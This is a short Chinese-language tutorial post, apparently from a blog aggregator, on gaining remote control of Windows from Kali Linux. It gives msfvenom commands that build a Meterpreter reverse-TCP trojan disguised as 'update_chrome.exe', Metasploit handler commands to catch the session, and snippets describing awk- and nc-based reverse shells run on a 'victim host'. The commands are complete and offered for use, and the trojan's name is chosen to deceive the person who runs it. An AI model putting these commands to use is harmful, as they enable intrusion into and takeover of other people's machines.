kali 反彈shell 遠端操作Windows

2021-09-24 01:35:50 字數 611 閱讀 1768

一、在kali終端執行下面命令,生成木馬。payload:/windows/meterpreter/reverse_https

msfvenom -p  windows/meterpreter/reverse_tcp lhost=192.168.1.72  lport=6666 -f exe > update_chrome.exe #名稱隨意

lhost: 本地監聽ip

lport: 本地監聽埠

-f  生成檔案型別   exe 為windows ,elf 為shell 

二、開啟msf控制台,監聽本地埠。

use exploit /multi/handler

set  lhost 192.168.1.72

set  lport 6666

set payload windows/meterpreter/reverse_tcp

exploit

windows 電腦上執行update_chrome.exe 程式後控制台自動登入windows系統。

反彈shell集錦

就是控制端監聽在某tcp udp埠,被控端發起請求到該埠,並將其命令列的輸入輸出轉到控制端。reverse shell與telnet,ssh等標準shell對應,本質上是網路概念的客戶端與服務端的角色反轉。通常用於被控端因防火牆受限 許可權不足 埠被占用等情形 假設我們攻擊了一台機器,開啟了該機器的...

反彈shell方法記錄

一 基於awk hacker機器上執行命令 nc l port hacker機器一直監聽某埠。在受害主機上執行命令 awk begin while c exit close s dev n 受害主機主動向hacker傳送shell連線。二 純nc hacker機器上執行命令 nc l port ha...

使用NC命令反彈Shell

本文使用兩台電腦操作,一台是kali 192.168.0.23 一台是mac 192.168.0.24 有些電腦不支援,而且跟機器使用順序還有關係。比如我在kali上 192.168.0.23 輸入 root kali nc l 1234在mac上 192.168.0.24 輸入 nc 192.16...